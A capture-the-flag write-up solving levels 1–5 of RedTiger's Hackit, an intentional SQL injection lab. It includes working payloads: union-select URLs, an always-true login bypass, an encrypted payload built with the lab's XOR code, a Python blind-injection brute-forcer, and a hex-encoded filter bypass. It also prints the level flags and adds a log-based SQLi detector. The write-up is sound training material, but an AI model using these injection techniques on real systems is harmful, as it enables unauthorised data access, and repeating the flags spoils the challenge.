writeup--RedTiger's Hackit

RedTiger’s Hackit

Level 1

First click into Category 1.
The URL ends with ?cat=1, which is obviously a SQL injection point.
The page also gives the table name: Tablename: level1_users
Constructed the following:
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

Got the password: thatwaseasy

Flag: 27cbddc803ecde822d87a7e8639f9315

Level 2

There is a login form, so this should also be SQL injection.
Tried the universal username/password ' or ''=' and the injection succeeded.

Flag: 1222e2d4ad5da677efb188550528bfaa

Level 3

The hint says Get an error. After a long time I still could not trigger an error, so I looked at someone else's writeup: changing the parameter to ?usr[1]=1 produces the error message:
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

Then looked at urlcrypt.inc, which contains the code below. So the long strings after cow and admin are encrypted. Since both the encrypt and decrypt functions are given, it is enough to write the SQL injection, encrypt it and pass it in. Incidentally, the encryption scheme has been updated since. If you want to use it, encrypt under Linux; on Windows the result may come out garbled (the srand()/rand() stream depends on the platform's C library in older PHP versions, so the keystream differs).

<?php

    // warning! ugly code ahead :)

    // XOR each byte of $str with a byte from rand() seeded with a fixed constant,
    // write the result as a zero-padded 3-digit decimal, then base64 the whole string.
    function encrypt($str)
    {
        $cryptedstr = "";
        srand(3284724);
        for ($i = 0; $i < strlen($str); $i++)
        {
            $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);

            // left-pad to three decimal digits so decrypt() can split in fixed-width chunks
            while (strlen($temp) < 3)
            {
                $temp = "0" . $temp;
            }
            $cryptedstr .= $temp . "";
        }
        return base64_encode($cryptedstr);
    }

    // Reverse of encrypt(): re-seed with the same constant so rand() yields the same
    // byte stream, split the decoded string into 3-digit chunks and XOR them back.
    function decrypt($str)
    {
        srand(3284724);
        if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))
        {
            $str = base64_decode($str);
            if ($str != "" && $str != null && $str != false)
            {
                $decStr = "";

                for ($i = 0; $i < strlen($str); $i += 3)
                {
                    $array[$i / 3] = substr($str, $i, 3);
                }

                foreach ($array as $s)
                {
                    $a = $s ^ rand(0, 255);   // e.g. "076" ^ 137: the chunk is cast to int before XOR
                    $decStr .= chr($a);
                }

                return $decStr;
            }
            return false;
        }
        return false;
    }
?>

The constructed plaintext is ' union select 1,password,2,3,4,5,6 from level3_users where username='Admin
After encryption:
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

Got the flag: a707b245a60d570d25a0449c2a516eca

Level 4

Clicking click me adds ?id=1 to the URL, which is clearly injectable; the title on the main page says it is blind injection.
First guess how long keyword is:
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
The length turned out to be 21, so write a Python script to brute-force it:

from urllib.request import Request, urlopen
import string
import re

chars = string.printable
# Boolean oracle: the page reports "Query returned 1 rows." only when the
# guessed character at position {0} of keyword is correct.
url = "http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')"
login = {'Cookie': 'level4login=there_is_no_bug'}
answer = ""
for q in range(1, 22):            # keyword length was found to be 21
    for i in chars:
        test = url.format(q, i)
        request = Request(test, None, headers=login)
        a = urlopen(request)
        s = a.read().decode()
        if re.findall("Query returned 1 rows.", s):
            print("{0}  ".format(q) + i)
            answer += i
            break
print(answer)

Got the keyword: killstickswithbr1cks!

Flag: e8bcb79c389f5e295bac81fda9fd7cfa
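As an added defensive example (not part of the original writeup), the following Python script shows how the request pattern produced by the level 4 brute-force stands out in a web server's access log: each character costs one request per candidate, so a single client sends many near-identical queries that differ only in the SUBSTR position and the guessed character. The log lines are constructed, and the probe signatures and the threshold are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not real server logs), modelled on
# the level 4 probes: one length oracle, then one request per candidate character.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /level4.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21) HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,1,1)='a') HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,1,1)='b') HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,2,1)='k') HTTP/1.1" 200 530
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /level4.php?id=2 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Assumed signatures for the two probe shapes seen above, matched against the
# percent-decoded query string: a length oracle and a per-character oracle.
LENGTH_PROBE = re.compile(r"length\(\w+\)\s*=\s*\d+", re.I)
CHAR_PROBE = re.compile(r"substr\(\s*\w+\s*,\s*(\d+)\s*,\s*1\s*\)\s*=\s*'(.)'", re.I)
SQLI_HINTS = re.compile(r"(union\s+select|select\s+count\(\*\)|\sand\s+[01]\s*[=<>])", re.I)


def analyse(log_text, threshold=3):
    """Return (flagged, positions): IPs whose count of SQLi-shaped requests
    reaches `threshold`, and the SUBSTR positions each IP probed. A lone hit
    may be a stray test; a run walking the positions is blind enumeration."""
    hits = Counter()
    positions = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line: skip, never crash the detector
        ip, path = m.group("ip"), m.group("path")
        query = unquote_plus(path.partition("?")[2])
        if not (SQLI_HINTS.search(query) or LENGTH_PROBE.search(query)
                or CHAR_PROBE.search(query)):
            continue
        hits[ip] += 1
        cm = CHAR_PROBE.search(query)
        if cm:
            positions[ip].add(int(cm.group(1)))
    flagged = {ip: n for ip, n in hits.items() if n >= threshold}
    return flagged, {ip: sorted(p) for ip, p in positions.items()}


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))   # ({'10.0.0.9': 4}, {'10.0.0.9': [1, 2]})
```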

Level 5

The description says watch the login errors.
Entered admin to try it, and the input box disappeared, so admin is being filtered.
It also ignores case, so bypass the filter with hex encoding instead.
According to the hint the password must be md5-hashed.
Constructed:
' union select 0x61646d696e as username, md5(123) as password #

Flag: ca5c3c4f0bc85af1392aef35fc1d09b3

To be continued
